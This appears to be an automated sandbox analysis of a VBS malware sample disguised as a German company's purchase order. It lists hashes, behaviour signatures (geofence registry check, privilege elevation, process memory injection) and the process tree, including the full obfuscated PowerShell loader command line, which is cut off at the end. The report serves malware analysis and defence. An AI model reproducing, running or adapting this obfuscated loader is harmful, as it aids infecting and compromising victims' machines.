ef79261375a9bd0decc0fb51b491d7a477f6cc96ef4f791ed304dae288fc3ef9

General

Target

Arnezeder GmbH -- Purchase Order 464379O1 xlsx.vbs
Size

294KB
MD5

06b0559091154cc539a8e57dd272b23d
SHA1

7858f6ff1916635679482ee30b061c1319ddb810
SHA256

ef79261375a9bd0decc0fb51b491d7a477f6cc96ef4f791ed304dae288fc3ef9
SHA512

8f53f017316b97305562e4875a0b2dcec026a2f40a2c075890a8f39c8c323d2c4943e29db3fb908b150aff14db6b6b65fb4d6252a6de3618a7028cc928fa5167
SSDEEP

6144:iBCt+orE7yNuQtyB1EXY0sMh+VcvP2pMoBQoHex3LD:iBCtZrE7ycQ4EXaMwVcveyoBQoHa3LD

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2228	powershell.exe
2228	powershell.exe
4664	powershell.exe
4664	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 2228	4320	WScript.exe	83
PID 4320 wrote to memory of 2228	4320	WScript.exe	83
PID 2228 wrote to memory of 4664	2228	powershell.exe	87
PID 2228 wrote to memory of 4664	2228	powershell.exe	87
PID 2228 wrote to memory of 4664	2228	powershell.exe	87

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Arnezeder GmbH -- Purchase Order 464379O1 xlsx.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pajonism = """FuFKauEknBicfotPeiIsoBinOv FoEAnkslsBipJuoCorKotRarSi0Re Op{Sv Pa Mo Va UnpMaaSarCaaMemSt(Ch[chSOltAlrTaiKunArgEl]By`$TiFBryFlrBirOpeFltSeyPavSpePa)Op;Sm In Ud Nd Ab`$grDtoeIsmOpoCudDdeHocNetWoiTacTa Ge=Ob unNFeeKlwAc-DiOGlbTrjBoedecRetos SpbKlyRetLaeOm[Tr]bo Sk(Fd`$HaFUnyDerHorWaeMetCoyElvNueeg.KaLTseAunAfgSttSkhFl Hu/Ti He2De)Pe;Ms Ko Bd ko FiFStosirIn(In`$dePTorXeeNoaHouPrdDiiLatNooUdrSiyCe=Ba0Un;De Jo`$PsPDirPaeSoaCyuMidkyiFotMioInrAfySi Ku-EnlGytSt Ty`$caFunyTrrOurPlePotPryAavPreAf.SlLFleAgnErgCitRehNd;Lu Cr`$RmPLyrUneMoaBeuSpdNoiEuticoSjrMuyAc+Ud=Ad2No)Ka{Ca En ru Ti In Ut Po Kn Bo`$DeDUneClmMooPrdGoeAtcbatciiSkcMu[Sk`$ApPTrrBeeKvaUluStdDriUntBaoSgrboyEf/In2Qu]Cl Be=Be Hy[MacLooConCavUseKorTrtBe]Ar:Bo:SvTWioNoBPryAxtTaeEx(Dr`$CrFBlyGorCorFreSutHaynevSwefr.FlSReudibAcsCotJurUhiPrnIngHa(Te`$StPTaruseDiaAmuUndViiTrtStoDorAfyPs,In Pr2Sh)No,Ce fi1Ta6Pr)oc;Af sp Lg`$BrDIseOvmsaoTidRoeBocCatCuiIncov[Vi`$EsPSprNoeMoaHeuZidUniBrtVeoSkrToyPe/Sk2St]Fo Fl=No Ar(ro`$CoDAceFomdroMidUdeFlcUdtFoiIdcKo[Sk`$ngPtirRdePsaTvuCudNeiPltScoSkrTeySt/Ge2Sg]Un Th-SubtrxPuoUrrDe Rr4Go7Ma)No;Mu Nr Ue Sa Dr}Fe Be[StSTetGsrSiiDynMigLa]Su[skSHayPesGitNoeBrmOp.GlTNaeUnxVatSu.ChEPanTrcLeoDodHuiFinCeger]ce:Pl:AsANiSUnCApIprIRa.ArGSkeSutLaSFltSrrDriUdnDigAf(Ss`$HeDLyePomNuoAmdMoeZacSktPeidicmo)fo;Ud}Le`$DeUUdnsktReuSkrPrfBieUndSe0hy=FaESqkTasTipDioDerCytStrKi0Go fl'Qu7NiCSt5Nr6un5SuCBr5kdBCa4OvAIn4Sk2Ar0No1Sk4MoBSp4Ph3Ig4Ma3Be'Sa;Ov`$DrUEnnBrtDiuDerPofIneStdas1Ak=AfESkkAhsFlpAuoForArtBlrDi0St Ph'Fo6Av2la4Pr6Ar4ReCTa5FeDDi4Ha0Co5NiCGr4Zu0De4th9In5ExBAf0Fo1Dy7Ek8Pa4Pa6Ak4Ta1No1ErCTa1SkDUn0fo1Li7HeASh4Ev1Mo5TiCIs4PoECo4Ho9Tr4HeAPu6Ab1Un4DiEAn5HeBBo4Er6Ka5In9ta4UsAOr6Lw2Ra4ygASa5DiBHe4Mi7Ta4Bo0Be4SkBSm5ReCAy'Af;To`$DeUFynRetstuunrPafAneAfdSe2Fo=AsEHakHasSapScoBrrKutFirSv0Sp Or'Na6Me8af4EnACh5PaBKa7CoFGr5EfDDi4Un0Ob4PrCRa6ReEPu4OrBFi4isBEf5exDNi4SaANa5PaCGu5OvCRh'Ho;St`$CoUNonSptKouUnrCofReeSadSe3So=DyEPhkBosCopDooUnrPstKlrTe0Al Th'An7AeCBr5Do6Sy5UnCTr5EaBli4SnAca4Fa2Af0Pe1Sc7UnDSm5WiACo4Co1Sk5LiBEr4Re6Ci4Op2St4GoATe0Kr1Ve6Li6Sa4An1Ma5MaBHa4HoAlu5FoDDi4St0Un5GoFOx7FuCSe4NoAHv5CiDme5Pr9Ar4to6Er4SoCOm4GaAKo5ToCUd0Se1Be6Me7Re4BhEUd4Fr1Ko4ClBUn4Af3Po4VeABa7GeDKr4MaASp4Ra9Fa'Th;Fo`$KvUInnPrtLiuRarGufpreEndHe4Su=EkEvekBrsChpCaoKnrTotPrrIm0aa Sk'Je5BeCGo5VeBat5AfDBi4Di6Tr4Ca1Sc4Or8Pe'R ;Op`$ArUFenSitquuAnrkofFeeAndPe5Ye=WaEakkCosUdpAmoPorSntAvrAf0Ov Be'Wi6Pr8Fo4jaAAf5koBAf6Sy2St4gr0An4DeBMi5RaABi4Ph3Br4FaASa6De7Gu4BiEHo4Cy1ca4UnBgy4mo3De4PaABr'Hi;Ka`$GeUAmnPatMeuSkrStfAlelodLi6wh=MoESykMesWhpfaoEfrPrtCarPr0st Ov'Un7AyDUd7HeBun7BeCRe5ToFTr4SuABe4boCWi4In6St4WiEan4De3Sp6Am1Ch4HyECo4Re2Sa4KaAHe0Fe3Ps0SqFan6Ba7Ch4Un6Re4OpBde4LsAMu6SiDOv5st6Ge7ReCFr4ud6To4Fr8Be0Th3Un0FrFPl7SlFDi5OcATh4SaDBi4Us3re4Me6Ag4NeCSr'om;Po`$InUarnLotAruNarTrfBeeApdPa7Ex=DuEDekstsSppKioLarMotFrrMi0Ep Ha'Fe7SmDUn5UtABe4Fi1Mi5AbBVi4Ny6In4Po2Su4EnABr0An3En0UnFCa6Il2Ho4SuEju4ba1Un4CoEMi4Sl8La4MoAMe4LeBCl'Do;Sn`$FaUUnnUdtShuSurDifVoeSkdFo8Sa=AnEDekDrsAfpAsoNarSytRerTu0Af Va'Ba7HeDPr4CoAAg4So9Ja4Li3Ro4InAIn4PeCRe5MaBCh4BaABe4WhBWa6KrBtr4TrALu4Ep3Sa4usASi4ri8La4OrEDr5JoBDa4HoATh'Fj;Re`$SkUMynKotBeuDerStfTrecadEn9Ga=NeEFukCrsHopBeoMorDetTirAn0kr Bo'Hl6Ae6Up4ma1Ai6ge2Dy4HaASy4Te2Hy4Gr0Ma5FaDOv5We6Un6Te2Pr4Eu0Wa4TeBek5WiAIs4Gr3An4ChAFl'In;Ge`$HvRFrdAgmweaDelSkeOptSp0Ac=VaEWokHysUnpNaoBerEptTrrBe0Ak Ad'De6St2St5Pe6Op6GlBEl4DeAaf4st3In4AnAcy4bl8be4BrERy5taBFr4WaANa7NoBUn5ph6Ke5seFly4GrAFr'Hm;fr`$KiRKsdNomStaEnlMieMitUs1Gr=TrEVrkTessepTroHurSvtEsrTr0Re Ko'Ba6CoCIn4Bl3ja4FlEno5PeCHe5SuCBe0Ru3Mi0CrFTo7MoFEv5IdAPi4poDMa4pl3Da4Da6Ax4GoCTi0Py3No0UnFSn7miCFa4PiAAr4ReEEn4Dv3Sk4pyAKo4BrBRi0Vi3Ud0InFSc6PeEDi4li1Fa5KrCVa4An6Cu6ChCOv4Af3In4BaEBr5SkCOc5BiCOp0Af3Sp0RrFSa6MaEKa5YaABo5TaBsp4Ou0Ri6UnCDu4Af3Op4FrERe5HaCSu5ScCAr'Do;Mo`$BeRDedSbmStaIzlVueUntAp2ba=StEVekLrsLapFooVurSptmurEm0Tv Ra'Fr6ou6Ov4El1Ho5Al9Co4Cl0Ov4Tr4Ga4PaABe'Ko;Sp`$AsRDedArmGraFelAneSntSy3Ot=GeEmckHosCopKaoScrKatCurPa0Do Pe'Su7UnFBe5PaADr4brDTy4pr3Eu4Ol6Pi4AdCAb0Co3Li0DyFSa6Ak7In4La6Ma4StBMa4RaAFl6CaDSp5Pr6Ld7ApCBe4Fr6Pr4Tu8Mo0Ro3Na0BrFMi6Ap1fo4BrALu5Pa8Tr7BlCWi4Sl3Mi4ka0Ex5PaBDi0He3Pa0miFJo7Me9Su4Ca6Sy5saDFo5AaBLk5BaANe4SkEco4Va3fo'Un;Ry`$ShRJedPrmBraTrlTeeSttro4Ti=RaEUnkDesTepStoEprPrtNerIn0Un Bi'bi7Kl9Pi4Sl6Di5LuDSp5stBAp5KlAmy4OpEDa4Ka3Sk6GeEPl4Te3Ri4Ha3do4Ca0Ua4BeCAn'He;Ov`$CoRbydcimFoaFolRaesktAn5Sp=OvEovkBisMapUroOvrbetPhrFr0Un ka'St4co1Ca5DoBNy4TrBLe4Cl3la4Au3Ja'Bu;op`$MaREudIcmTaaSelSueditOb6Sa=MaEDekElsWepAfoterDitSyrIs0Vi Fa'Sn6Im1Cr5SuBTe7DrFpe5NeDEb4Re0He5KoBCh4HoALe4MnCAw5StBLy7Sk9Co4Na6Di5CoDPa5doBUl5ReAAn4MeEZe4Wo3Fr6In2Co4FoASl4Ga2Fo4Il0Is5SaDSe5ar6St'Ov;Sk`$PlRRedWomBuaAslSteSptSa7Ge=BiEPlkCasMepVroBurFitUnrDr0ce Do'Dr6Ba6Fr6AlATa7No7Ar'Wa;De`$NiRTodDamInaKalLoeFetIn8Sl=EnEInkResFopexoMaromtEsrDe0Kv Sm'Fo7ud3Vi'Si;RifSuuOenUncSttRsiStoKlnEn LafMakOppHa Cu{SvPLaaNerHaaOrmpr De(Op`$FlUOpnSkrCaeHaaUllBlildzFraPebFllSteBesGy,Pi Lg`$SaISudIneNemInnPudNu2Ne4st7Dr)Af Ra Po Is Fl Fo;Ph`$alsBatTrrFlaovfHy0Mi Am=PaECokHysDipaeoHerFotInrTa0Di Fa'Af0DiBOl6Re2be4EtAMe4TiACe5TrDBe5SuCAl4DuCTi4Zo7Po4SlETy5TiAFr4Av2Gr5ecCfo0BeFSv1Sa2Se0LoFUt0Di7In7Ju4si6UdETr5ChFAn5PaFUn6JuBOp4Ti0Mo4sp2su4TiEPe4Ma6Or4po1pr7su2Sp1Su5Pr1Sn5We6BaCOp5BrARe5IsDRi5HsDSk4BoAFi4Ri1As5EuBNy6MeBto4Se0Ty4Pr2sk4DoEUn4Al6Si4Kr1Pl0mo1Ki6Hy8Be4KvAFj5ReBul6AlEAl5BrCUd5AgCRi4HuAtr4Ca2Py4PlDhe4Ur3Br4Si6co4MoApi5UdCRk0Sp7Pi0An6Sp0BrFDo5Dy3Av0PrFse7Di8Li4Lo7Do4LiACo5SeDRo4WoAWi0Co2Wi6ko0Fo4PhDAn4Fe5Kn4SkADi4GeCfu5feBNi0MaFxa5Fo4Br0AtFMu0KlBBr7Pr0En0Al1Fe6Sy8Us4su3Br4No0Pr4MoDIm4NoEkn4Op3ro6BiETr5LiCSa5grCga4StAGe4Ku2St4SmDov4Re3Sm5Ve6Un6SmCIn4UnEDi4HjCTe4Di7Mi4GlAKl0SmFAn0ke2Re6DrEUr4hy1Ze4FrBUd0euFAn0NoBHe7Sk0Wo0Dy1Ma6Yo3Sa4Un0Gy4SuCPr4KoEPe5SuBHo4Ba6Pa4St0fo4Su1Mi0Di1Pr7SyCSi5LuFPo4Hr3Mi4Py6Bi5TrBAd0En7Om0EuBNo7JeDPr4SuBBa4Be2Ex4SiEsc4so3Ef4acANi5FoBOm1Kl7Dd0Me6Mi7Om4pa0Br2Pt1UnERe7pa2Be0He1Pi6UdANe5OuEDe5SiATa4OrEHo4Me3Ov5ReCGe0Su7Ch0ElBre7RaASo4Fu1Sl5grBBe5UnARe5UdDfr4Fe9Ce4LoAUn4PaBUn1NeFAn0Ma6Ce0SoFpr5Ed2Gu0Ko6In0Ma1Fi6Cl8Ce4gtAco5ReBPo7AnBUn5tr6So5KuFTr4BeAEl0Mo7Sh0HoBTh7IrACh4Pr1Kn5NoBAf5HoAin5PrDPi4pl9Wh4dyASu4PaBSt1LuEAl0Ti6Sr'Ta;Un&be(Me`$PuRStdUvmHaaMolAceNotPr7ma)Po Fi`$UnsactTurSkaTufPs0Qu;Fa`$SusfotShrSyaNofGl5Sr Fi=vo SmEUnkFosKopAfoEdrDytBrrAg0Sm Ra'Gi0ChBRy6tr0Se5MeFbi4Se2Af4CoEPr4St8At4ErEBe5UdCUd4St6La4Rv1Un4TaAPo5foDSe4My6Sp4Be1Ta4Do8Ud4BlADe5SkDal0DeFBr1Co2Fa0NoFSy0imBFe6Bo2Re4FoAFr4SkARe5SkDGe5SiCPa4SpCMi4de7Br4NoEQu5BiALy4No2Ta5TrCBa0Sc1un6Ma8Ca4DeADi5BiBBo6Pr2Ve4MaAVi5brBAl4Im7Ph4Ko0Cr4InBBo0Ap7Fl0StBTr7CaASu4Po1Vi5KlBVo5TrAHe5GeDBo4Op9Sy4EmASu4MaBFa1juDFl0Lu3Pa0KoFte7Ud4ph7InBCr5Af6Id5HuFAn4DeARe7ko4Br7Be2Tr7Ch2In0SnFSn6LiFPr0Gu7Kn0inBSt7WhAFl4Ka1Fd5SkBAf5ChAVe5InDHj4Ar9Vi4slALy4SnBEl1bjCEm0Fl3My0FiFBe0ReBSk7FyAAs4Fa1Pa5LaBUn5EiACo5UnDGr4Ho9Do4MaAUd4OlBal1BuBSy0kl6ko0De6Po'Hv;In&ra(Ci`$SvRRedEjmLaaOmlMoeBatBl7Ov)Sk Ch`$GesCatFiradaZyfHu5Tr;Sp`$RasEttCarpraAnfCu1Sa Re=St GrEPakSpsLopSeoNorBatRerCo0Tr Im'Sp5BeDLi4TrAAf5BeBHo5SpASp5SoDBo4Be1Co0FrFFu0MiBCo6We0Sy5ImFOu4Gg2Ha4CoETe4Pe8Wa4NaESk5ugCFl4Br6Di4Im1Ho4SwAGa5TsDEm4Si6Am4Iw1Cy4An8ac4TvARe5AnDBe0Dr1De6fu6Ps4Ko1Ha5Sp9Cr4Re0op4Ci4El4CiAFr0Mi7Ig0MaBPo4As1To5ZoAfj4Sl3Du4Gr3fo0Ac3Tr0umFEt6JaFtv0Ga7Ra7Sp4ld7NoCNe5Du6Ho5QuCCa5AnBFl4LyAKr4in2Am0Te1Ac7faDuf5CoATa4St1Fu5UnBGa4Sp6Un4Sh2Tr4FrAPe0Fo1en6le6La4Wh1Ce5AnBTr4PoASp5PaDor4Ba0St5DrFPu7YaCDe4KrAMo5SyDSa5Fo9Ir4Ps6Qu4saCSe4EsAFi5FoCCa0Me1Ek6He7Sk4inEVa4Tu1Fi4omBRy4Me3ve4xeASu7LeDRo4KoAMu4Re9Aa7Ch2Hi0Cr7ko6Pu1Ko4ChAve5pa8Hg0Re2Gi6Vo0Ek4UsDNa4Fw5Sk4ReAPo4MeCRu5TeBEt0geFIn7CoCNo5Ud6Pi5DiCVa5NoBsq4PrASm4Mb2Yi0Co1Dr7PrDMi5JeAIr4Sk1Ut5InBSh4di6Un4Is2be4FoAPi0Ur1Re6Me6Ja4Pr1Ps5NaBFo4UnASt5ChDMa4Ph0Fo5PaFAi7KrCVo4AnASa5ArDRr5oc9El4Su6Ba4AnCEk4BrACa5NiCLo0af1Sq6Fo7Pl4RoEEn4Ar1Mo4BaBWi4An3Un4LuAGr7FiDSo4RiAFr4Sv9Na0Re7Pe0re7Br6Ty1Pr4RoASt5Sy8Bi0Mo2In6Pi0Bu4MoDUn4st5Ac4axAPa4DoCHu5InBAl0HoFQu6Fe6Vi4Ca1Br5DeBHe7stFne5SuBAl5liDFa0Bl6Ar0Ej3Ga0frFMt0Br7Me0CoBSa6Si2Ur4StAIg4KnAEm5ViDEl5isCUd4UlCGe4Di7pl4TeEPu5FoAUn4Un2Le5PhCat0Po1Ha6Am8Na4RcADy5PeBSp6Pu2In4JoAAn5BaBAn4st7Th4mu0bi4OpBNo0As7Se0PrBSw7CoAPa4En1St5SkBIl5BeAEs5FlDFo4Si9Ba4KoAEl4SyBCh1VrAAs0Co6Sh0Ma6Ca0Se1ve6an6La4Sh1At5Su9ud4La0Sa4Fi4La4KrAva0Na7Pr0MaBBu4Ca1Tr5InAKn4Re3Mo4Ha3Gt0Ba3Ly0MeFre6ReFBa0Of7Sm0SuBSl7BuAEn4an1Sc5PlDDa4EnAFe4koEIv4mu3Ra4he6Ka5Me5Ma4TiERa4inDVi4Un3Sy4VaATh5TiCSe0Fu6Aa0Hu6Su0Sp6ni0De6Bo0Fr3Be0LsFCa0foBCa6Pa6Bh4QuBTr4GrAMo4Pi2Pa4ke1Se4TtBVu1OuDDi1FlBTo1Re8St0ud6Ne0Gr6Ca'No;yo&Ud(Bl`$FiRAndGumSnaGrlDieLatSk7Re)Cr Cy`$bisOvtFlrMoaamfTy1Sa;Kl}KafScuLonPacaftSsiDdoLinBe MaGEkDFaTRa Co{anPBraMarkoaDimSi Id(Fo[StPNoaUbrobaUlmPoeDatLieNerTr(ChPAroOvsLaiPitHaiReoInnKy Si=Vo Sl0Hu,Pe ReMPaaDenOvdWraPltPeoUlrSuyeu Am=Af Sp`$enTVirAduNeeBy)De]Ek Ap[NoTPlyEnpAeeBi[Vi]Pl]Un Mo`$HjhBreBurPibFloSarEciCazAfiMinAugsk,Bj[stPGsasurEmatomineSptFreUnrPa(DuPAloKvsSiiGltFoiImondnhe Ja=Ta Ca1Pi)De]Ld Su[SeTDiyonpKueAv]Ka So`$InCThoPrnPhdBreSlcMieDanTwtGi Er=Fo Le[StVNooStiTrdCo]Pe)Ch;Ov`$UrsIntFirAnaAlfTh2La Hu=St crEKokKnstipAroSarSltEprUi0Sk so'Zo0AnBSk7EpFTr4tu7Fl4laEOv4Ve8Re4NoAGo4ReBUn4AlATo4Sa1En4To6dr4AnCTr4RuEun4St3Sk0TiFGa1Ra2Je0RyFRe7Fn4Qu6RyESh5FaFFi5GrFsn6geBVe4St0Ga4Su2Ov4KoEHi4Lo6Ub4Pi1St7Et2sl1He5La1Ta5Po6ArCph5InACh5VoDIn5HyDTe4EnANo4Te1Lo5UdBSu6AuBIn4Fo0Ps4Ad2Qu4UnERu4Ri6Lu4Ha1Af0Dy1Sa6LiBOn4PrAmo4Wh9Ge4Vi6Ly4Ma1Un4PaAPh6FoBSt5He6Su4Wa1Te4StEGa4Pr2St4Ga6Mi4HiCGn6SuESk5TuCRe5ReCRa4ReAJa4Le2Ad4EbDTe4Na3Re5Un6He0Kl7Wi0sa7Pr6Vr1Fo4NoAAn5Sc8Wh0Bl2An6Be0wa4BrDMa4Co5de4TiASe4HaCMe5PaBDi0UnFAs7TaCBl5Re6Su5DoCst5SpBva4soAFl4Bu2bo0Re1Bo7SaDMy4ChADo4Ha9In4Ps3Re4OmALi4BuCGh5DiBUn4In6Po4Su0Vu4Si1Rk0fo1Gy6gnEFo5OuCtr5LjCFl4HoASm4Fo2In4atDau4Sk3Sk5Au6He6Av1Af4DiEPr4Ex2bi4CuACo0Pr7ma0inBFu7TaAep4No1Fi5UnBHo5TrAFy5SlDVg4Ni9Lv4InAoe4BeBmi1Ur7Af0Op6Me0Go6Re0Ha3Pa0diFL 7pr4Zi7NoCFo5St6Di5CoCbl5TeBSn4DeAre4Gy2Ma0ta1Tn7MaDIn4JoARe4Gl9St4Ap3fa4SeACl4GeCSt5KnBMo4Sl6Sc4Om0sa4Gu1on0Ce1Ap6AnASv4Co2Fa4Un6Gl5siBMo0Ch1Nu6slEbe5ReCPr5WaCBi4LiAFr4Ps2Te4LaDUd4Cr3Ve5Fr6Ud6GiDSi5KoAEt4pa6Po4Be3Gr4CiBSl4brAFi5ShDPr6LuEMe4FaCFr4NoCLo4GrAEr5UnCEg5PrCBe7Ba2Be1Fj5Op1Op5Un7ToDUb5FiASe4Un1da0Fi6Ta0De1Go6PaBla4KoABa4La9Ac4Pr6pr4Re1He4CiAMa6KuBKa5An6Va4Dy1Pr4FoEHe4Em2Mi4Ch6By4liCRe6Po2Ca4Fl0Tr4KnBTa5StABi4So3Br4CaADi0Kr7Ga0LiBRi7UnAUn4Ap1Kr5CoBJo5UnAEr5UdDEp4Re9Mo4ViASu4FiBUn1Se6Re0Pr3Da0SkFDa0LaBFo4se9va4LaELo4Me3fu5KrCge4udACr0Ka6St0Ga1Bo6JiBUn4TaABr4Be9Cr4Di6Mi4To1Gr4OuAEm7CuBSe5Do6Aw5BiFyv4StAVa0Pr7Ak0auBTi7SwDDr4VaBTr4Te2Ov4BeEbi4Ch3Af4hyAGr5WeBHe1InFSp0Fr3Re0FaFUn0SpBRo7crDFi4UnBAn4Ar2Sl4caEEf4Ev3Ku4SeAAr5ScBMy1NeEAn0Tr3Gr0ApFHo7Pe4Li7SpCSt5Sk6St5PrCNa5SoBWo4TrASo4Ba2gi0As1Fe6Be2St5DyAFr4Tr3Da5DuBCh4Vo6Kr4VeCEi4KlEVi5HaCSt5PaBTe6GaBps4HaATe4Vi3eg4deAUn4Lu8Wi4UnESt5BeBVa4SlAAf7Co2Ol0Ca6Ru'Aa;To&Me(Im`$TyRCodSmmpeaEmlfueSatBe7pr)se Ve`$GusUntBrrleaskfPi2In;Un`$HosBatSnrBeaVafKl3Em Fo=Ko HuEFakExsPspFdoInrintBrrco0Re Sk'Fo0TrBRe7UrFSk4Fe7No4NoEAb4Di8Hv4peAFa4ElBAf4UdADi4Fo1Hj4Ae6Sp4TrCIn4FeEMo4Pa3Ma0Kl1An6SkBAs4FoAsk4Bi9Co4Ud6Jo4On1Ra4BrAAd6PoCAd4Su0Kl4Ef1De5DrCAf5kiBNo5GrDFi5PoASk4BaCPi5XaBVa4Sy0St5RaDra0vr7Dr0PeBCr7NoAKu4Jo1Un5SoBAf5KoAJo5opDMu4Ke9Au4DoADe4PeBCh1Ge9Ma0El3Ac0oiFMo7Ba4He7SpCAd5St6Ne5FrCPr5BoBUb4KaAHe4Bi2Wi0Re1Is7InDBl4BuABe4Ny9Fr4Po3Ve4FiAUn4AfCSo5PoBOr4No6Op4Co0Fi4St1Un0Tr1Un6MaCPe4SoERe4Ov3Fl4St3Ju4An6Su4ek1Sy4Un8Ad6OpCHe4Fr0Al4An1In5An9Se4PrADu4Pr1Re5EsBSy4Pr6Re4Ma0Pa4Ti1su5TrCBa7Sn2Be1Ni5Ag1Br5Pr7GlCBe5SwBOm4ShEMo4Ca1Ci4MiBBe4OpEGe5AbDKa4PjBTa0se3De0PlFFe0KaBAl4fo7An4CiAEf5SkDBi4FyDKb4Gu0Pl5HeDGe4Va6mi5Am5Uf4Gr6Do4Th1Ma4Ha8We0Ko6Ao0Ok1co7roCTe4DuASt5DeBGo6Sy6De4St2Sn5TiFFa4Ot3Fl4TuANo4El2La4PrAFe4Av1ba5NaBAb4DkECo5KrBKl4An6Re4ci0Na4Me1Ba6he9St4Be3ma4ChEPn4Su8Un5GrCCo0Sm7Se0CoBna7PeAIs4Ne1La5SvBUd5UnALi5TiDKv4Ty9ga4BaAAl4MoBHa1Ho8Na0Br6Pa'Af;Sa&Pr(Ta`$KyRRedStmVnaAflDeeFotoa7Tr)No Me`$DrsFrtTerAeaKofTa3Pe;An`$PrsSutFlrBeaAlfAr4An ka=Tr TuEFlkPrsDepMuoRarMitRerSt0ha Fa'He0HaBPi7PaFJo4Ls7Ri4HyEUu4ps8Om4HaATi4FrBMe4RoAPr4El1fo4Ap6Do4WiCpa4EaEEn4Ce3We0Fo1Ci6SmBVi4AfAAp4Me9la4So6Ma4Gl1pa4inADe6Ha2Di4MeAal5BeBPe4Tu7Te4Ej0Af4saBSa0Re7Ve0siBpr7MyDFo4slBTe4De2Al4DeEDi4Tv3Op4InAUn5DuBCu1FoDSt0An3Ca0StFPr0BuBBr7AaDSa4ReBKa4Co2Ko4GiEOc4Te3Ve4HeAFu5AmBBa1InCSp0cy3Be0ViFDr0FaBGe6FlCTe4Mi0Fi4Pa1Sk4unBMi4AlAMa4SeCDi4OhAAr4Ve1Ha5ArBUn0Sw3Ea0trFKl0KaBUn4Bi7De4BuANe5UdDAr4InDbj4my0Ud5spDLa4Me6Ab5Pt5te4Sp6Dr4Un1Th4Hv8su0Co6Sa0Ah1Dr7MoCPo4KlANo5peBSu6Ki6Re4Sn2In5UnFCa4Ad3Po4AcANo4To2Ta4RaAPu4Pa1Ag5SkBTa4stEsq5BoBpa4Hu6Ge4Es0pl4Ch1Br6Th9sk4Ma3In4StEAr4Sk8Sc5StCMe0Ti7Ch0ArBGo7KuAFa4Hy1Na5MoBAa5BlAEj5DiDDe4Br9Ro4ToAEj4MaBCu1Ca8Ta0Gy6Se'Qu;Ab&La(Un`$KlRSpdHumAlaAllspeSotmo7Fi)Da en`$DesRetNyrKiaGyfAv4ju;Ba`$SvsbltFlrSuaMofUn5Yo fu=Et ChESlkBlsSopOvoUnrvotrerIn0Fr Ta'Bl5ReDHa4enAMo5CuBTi5RkAMu5LgDDe4Cu1vi0MeFBr0LeBVi7MiFAn4Co7He4ShEDo4Pa8Sp4FiAEs4RhBfo4CaASk4Sk1Se4Tr6An4HeCSk4PiEQu4Fa3Sp0Sv1Bo6skCSw5UfDPi4StAFl4HeEAs5SkBDe4OvAPr7ClBFl5Di6Us5FoFDe4RaASl0Nu7Sk0Qu6Sk'St;Te&je(Ca`$ImRLudNymKoaMelBaePatRe7si)De In`$StssttSnrkraOefAt5Ba Op Ti De;Mi}Cr`$ArLIsiEtnAfaHugDyeVi Na=Di FoEYpkPrsAdpSyoInrDatchrTr0De Ny'Be4Dr4Br4SwAMe5AnDAn4Cu1Ka4SaAPa4Ex3Co1AgCun1UoDDi'Te;Co`$VesSrtGrrKraAnfna6Pr Ka=La SiELdkCosMapOsomarUdtRirUd0si vi'St0blBIn6diEFl4ReBNo4Ha2Af4St6Th4Ob1Ag4Nv6Do5ArCPr5RoBGi5SpDCe4DiENi5MaBBe4St6Bu4ar0Ve4Ga1Ne5BlCBo4ChCKa4Mi7Hu4CuABz4Br9He4FrALi5UdDPa0ovFDe1my2to0glFBo7Bg4Se7FoCTy5Fl6St5emCPe5MaBEp4FoASt4Me2af0Le1Un7BaDTr5NyAPy4Un1El5CoBRe4Pi6Ce4st2Pl4AdATr0Bl1Vr6Ha6So4An1Br5SyBKo4InASt5LyDPr4Br0Ag5BlFMc7UnCAn4DuAGu5StDEx5Ma9Fr4Fr6Sp4MaCFl4TeAHo5PeCan0So1St6Ve2ka4GaEIr5ReDEx5DuCFr4Le7Se4BrEDi4Bu3Pr7Sn2Al1Fl5br1zo5Hy6Kv8Pa4enASa5noBOv6OvBRe4peALu4Ho3He4SiAPr4Le8Bu4GeEFl5ReBAf4StAMa6Is9Mi4Pa0Cl5AnDCi6Ra9Fo5BoABo4Un1Fu4ImCIn5FoBRe4Tr6De4Al0Tr4Ut1Ti7KiFhu4Un0Ce4Do6Pl4Co1Ry5HnBAm4StAIm5DoDKn0Gr7No0Co7Ba4sd9Ch4Re4Fi5UbFTo0ShFKl0LiBCo6Fo3Sa4an6Sv4De1Ko4JuEPe4An8Co4TeABe0EnFLi0IrBEy7koDba4SvBTr4Qu2Un4NuEEv4Se3Rm4SkAbl5FlBIn1UtBUn0Ko6Ua0Bu3El0AbFfe0Ch7Re6Hi8Un6ArBTu7UdBBe0UnFTi6PsFGi0Kl7La7An4An6Pa6Ja4Pr1Gr5HyBHo7FaFMa5CaBTa5teDCe7Cr2Sw0Aa3La0djFTi7la4re7gaASo6Gr6sl4Co1to5moBUn1PuCMa1UnDGr7No2Un0Tz3Ca0KoFDa7No4Ak7BeAUn6Do6Co4Gr1Re5KrBSp1TeCLi1loDCa7Ge2La0Ho3Ri0GeFSn7An4Ov7ReACr6Sh6Sy4Sk1kl5neBDa1foCCo1brDTh7Nu2Be0ce6De0skFAu0Al7Sk7Kl4Ca6Nu6Aa4Ce1Ud5AlBSe7roFNa5SyBCa5AnDTo7Wa2Mo0Da6Lv0em6Kv0Or6Bu'Im;Me&Sa(Sn`$SuRVodAlmPhaStlVieMetOp7pr)Se Se`$SpsDutFrrScaTrfUd6Sv;Kn`$GaSOmoSiuElrSphnaeReaImrhvtEmeAfdRe Ln=Ha BufUnkCopDi Cy`$AmRVidLamRoaDolaneSptSu5Co Di`$FrRMidAdmUdaUnltaeTatPh6Ne;Pe`$DrsNotChrBjaSpfHy7Ti Bi=Br 